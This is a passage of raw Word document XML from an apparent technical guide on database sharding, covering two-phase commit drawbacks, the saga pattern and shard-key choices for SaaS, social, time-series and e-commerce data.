      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="5D0B26F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3CC0C0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:lastRenderedPageBreak/>
              <w:t>Participant fails after VOTE YES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BB4F7B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Coordinator proceeds (has all votes).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E4F156" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Participant recovers, checks coordinator for decision, applies it.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00875520" w:rsidRPr="00875520" w14:paraId="41CFACC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E1B5F5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Network partition during COMMIT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0E39A4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Some participants get COMMIT, some don't.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C626E9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
            <w:r w:rsidRPr="00875520">
              <w:t>Blocked participants wait or query coordinator.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="57246379" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Why 2PC is avoided when possible:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A090B99" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1569"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Latency: 2 network round trips minimum.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380EC2FA" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1569"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Lock duration: rows locked from PREPARE until COMMIT (across network round trip).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="295AB4DB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1569"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Blocking: coordinator failure blocks ALL participants.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D90CB4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1569"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:t>Throughput: long lock duration → high contention → low throughput.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CC91261" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>7.3 Saga Pattern — The Practical Alternative</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D30DE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C8F15E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Saga for money transfer:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE0818F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="75D71FB1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 1: Debit $100 from User A (Shard 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E7B3D9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Compensation: Credit $100 back to User A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BEB710F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="225D3580" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Step 2: Credit $100 to User B (Shard 3)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CDA3C4D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Compensation: Debit $100 from User B</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4836C9" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6C6A6434" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Execution:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48931F05" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Step 1 succeeds → Step 2 succeeds → Done!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F19CDAB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Step 1 succeeds → Step 2 FAILS → Execute Compensation 1 (credit A back)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BF40492" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Saga orchestration patterns:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B601AA6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Choreography (event-driven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EB2254" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1790CA0F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1 debits A → publishes "A_debited" event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28A45740" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 3 listens for "A_debited" → credits B → publishes "B_credited" event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43B3F5C3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>If credit fails → Shard 3 publishes "B_credit_failed" event</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E80690" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard 1 listens → compensates (credits A back)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0550C285" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Orchestration (coordinator-driven):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="064313A1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5654BA83" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Saga Orchestrator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B84282F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  1. Tell Shard 1: "Debit A" → wait for success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68063876" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  2. Tell Shard 3: "Credit B" → wait for success</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51B0F935" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  3. If step 2 fails: Tell Shard 1: "Compensate (credit A back)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D554724" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="426B8BCA">
          <v:rect id="_x0000_i5765" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B96DE3D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8. Sharding Specific Data Patterns</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05D87972" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.1 Multi-Tenant SaaS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB7AF21" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC65EFB" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard key: tenant_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E367C6F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="5B50591B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34775626" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Complete tenant isolation (one shard per tenant or group of tenants).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6130B483" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - No cross-tenant queries in normal operation.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2489F516" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Can place large tenants on dedicated shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8C0B42" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Can apply different configurations per shard (tenant-specific settings).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2698BAA5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="4C3D1359" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Packing strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E1C1B24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Small tenants: many per shard (packed together).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="774A1DCD" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">  Medium tenants: dedicated shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716626A0" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Enterprise tenants: dedicated shard cluster (multiple shards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4AA5A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.2 Social Networks</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D6843FE" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64054681" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard key: user_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396EBDE5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="6877DDC5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>User profile, posts, friends list: all on same shard (co-located).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983B7C4" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="2D2DB4F1" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Challenge: Reading a feed (posts from all friends):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D835A1E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Friends are on DIFFERENT shards → fan-out reads across N shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4324FF33" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D5F1A3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Solution: Fan-out on write (Twitter approach):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="447ED11B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  When User A posts → write the post to the FEED of every follower.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5028DA24" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Each follower's feed is on their shard.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A456F0B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Reading feed: single-shard read (pre-computed, local).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64C1DC46" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C2C5D1E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Cost: celebrity with 10M followers → write amplified to 10M shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFD331F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  Solution for celebrities: fan-out on read (only for users with &gt;10K followers).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="289F0368" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.3 Time-Series Data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="775269C5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB0A53A" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard key: time_bucket (e.g., day, week, month)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26BF62E3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="17415684" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard "2024-01": All data from January 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A0B456" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard "2024-02": All data from February 2024</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70330B6D" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>...</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="714A39AC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="47937D09" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:lastRenderedPageBreak/>
        <w:t>Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00309E5C" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Range queries by time are efficient (hit specific shards).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6437EBF6" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Old shards become read-only (can be compressed, archived, moved to cheap storage).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50643394" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Retention: drop old shards entirely (instant, no row-by-row delete).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F1B9C9E" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="515429CC" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Challenges:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D44D21" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Current shard handles ALL writes (hot shard).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F9FB28B" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  - Solution: sub-shard current time bucket by another dimension (device_id, region).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C916A3F" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>8.4 E-Commerce (Orders)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A5AE27" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C170202" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Shard key: customer_id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B4D987" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7A09B880" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Co-located: customer profile + their orders + their payments</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61F809FF" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → "Get all orders for customer X" = single-shard query ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03A47373" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → "Get order details" (if order_id encodes customer_id) = single-shard ✓</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EDC743" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520"/>
    <w:p w14:paraId="7B022FED" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>Challenge: "Get all orders with status = 'pending' across all customers"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF58818" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Scatter-gather across ALL shards.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F72B0E5" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Solution: Maintain a separate index/service for global queries.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF93987" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t xml:space="preserve">  → Or: CDC to Elasticsearch for cross-shard searches.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D20BF17" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:pict w14:anchorId="32DE97A1">
          <v:rect id="_x0000_i5766" style="width:0;height:3pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4FC765" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9. Handling Global Queries in Sharded Systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA15937" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00875520">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>9.1 The Global Query Problem</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07E85FA3" w14:textId="77777777" w:rsidR="00875520" w:rsidRPr="00875520" w:rsidRDefault="00875520" w:rsidP="00875520">
      <w:r w:rsidRPr="00875520">
        <w:t>When data is sharded by one dimension (customer_id), queries on OTHER dimensions require scatter-gather:</w:t>
      </w:r>
    </w:p>
